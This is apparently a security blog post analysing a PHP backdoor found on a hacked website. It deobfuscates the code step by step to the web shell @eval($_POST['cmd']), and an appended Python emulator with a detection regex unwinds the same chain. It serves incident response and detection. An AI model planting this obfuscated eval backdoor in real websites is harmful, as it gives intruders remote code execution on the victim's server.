SBM Labs

Cyber Security Collaboration Project

Simple PHP Backdoor
05 Jul 2017

Was your website defaced and its position in search results dropped? Unfortunately, you were hacked.

Let's look at a real case of a successful attack.

1. Check web-server logs.

First of all, you can search the access log for suspicious POST requests.

# cat ***.log | grep POST | less

Suspicious requests to the script search.extender.inc.php were detected.

2. Check script content.

Suspicious code was detected.

3. Analyze suspicious code.

$avj = str_replace("j","","sjtrj_jrjejpljajcje");
It's the same:
$avj = "str_replace";

$qu = $avj("i", "", "ibiaisie6i4i_dieicoide");
It's the same:
$qu = "base64_decode";

$fh = $avj("k","","crkekatkek_kfkukncktkikon");
It's the same:
$fh = "create_function";

$hwy = $fh('', $qu($avj("c", "", $or.$zs.$lq.$bu))); $hwy();
It's the same:
$hwy = create_function('',base64_decode(str_replace("c","","cIEBldcmFsKCRfUE9TVFsnY21kJ10pOw=="))); $hwy();
$hwy = create_function('',base64_decode("IEBldmFsKCRfUE9TVFsnY21kJ10pOw==")); $hwy();
$hwy = create_function('', '@eval($_POST[\'cmd\']);'); $hwy();

It's a backdoor. As you can see, the attacker passes PHP code in the "cmd" parameter of POST requests, and the script runs it with eval().
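The same str_replace / base64_decode / create_function chain can be unwound automatically instead of by hand. The following added example (not code from the original post) is a small static emulator for the few PHP calls this backdoor uses, plus a check for the resulting eval-of-request-data pattern; it assumes the concatenation $or.$zs.$lq.$bu yields the base64 string shown above.

```python
import base64
import re

# Constructed sample reproducing the chain from the post; the concatenation
# $or.$zs.$lq.$bu is assumed to yield the base64 string shown deobfuscated.
SAMPLE = r'''
$avj = str_replace("j","","sjtrj_jrjejpljajcje");
$qu = $avj("i", "", "ibiaisie6i4i_dieicoide");
$fh = $avj("k","","crkekatkek_kfkukncktkikon");
$hwy = $fh('', $qu($avj("c", "", "cIEBldcmFsKCRfUE9TVFsnY21kJ10pOw=="))); $hwy();
'''
# Only the functions the chain uses are emulated; create_function yields a
# tagged body instead of real code, and "calling" it just records that body.
BUILTINS = {
    "str_replace": lambda a, b, s: s.replace(a, b),
    "base64_decode": lambda s: base64.b64decode(s).decode("latin-1"),
    "create_function": lambda args, body: ("FUNC", body),
}
TOKENS = re.compile(r'\s*(?:("[^"]*"|\'[^\']*\')|(\$\w+)|(\w+)|([(),;=]))')

def emulate(src):
    """Statically evaluate the chain; return (variables, code that would run)."""
    toks = [m.group(m.lastindex) for m in TOKENS.finditer(src)]
    env, executed, pos = {}, [], 0

    def expr():
        nonlocal pos
        tok = toks[pos]; pos += 1
        if tok[0] in "\"'":                             # string literal
            return tok[1:-1]
        val = env.get(tok) if tok[0] == "$" else tok     # variable or bare name
        if pos < len(toks) and toks[pos] == "(":         # call through resolved name
            pos += 1; args = []
            while toks[pos] != ")":
                args.append(expr())
                if toks[pos] == ",": pos += 1
            pos += 1
            if isinstance(val, tuple) and val[0] == "FUNC":
                executed.append(val[1]); return None     # $hwy(): dynamic code runs
            return BUILTINS[val](*args)
        return val

    while pos < len(toks):
        if toks[pos][0] == "$" and pos + 1 < len(toks) and toks[pos + 1] == "=":
            name, pos = toks[pos], pos + 2; env[name] = expr()
        else:
            expr()
        pos += 1                                         # skip ';'
    return env, executed

def is_backdoor(code):  # eval of request data, the 'cmd' POST pattern from the post
    return re.search(r"eval\s*\(\s*\$_(POST|GET|REQUEST)\b", code) is not None
```

Running emulate(SAMPLE) resolves $avj, $qu and $fh to the real function names and records ` @eval($_POST['cmd']);` as the code $hwy() would execute, which is_backdoor() flags.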

P.S. Never forget about vulnerability management and use protection technologies. These should be basic exercises in your security program.

Read OWASP Top 10 A7 - Insufficient Attack Protection.
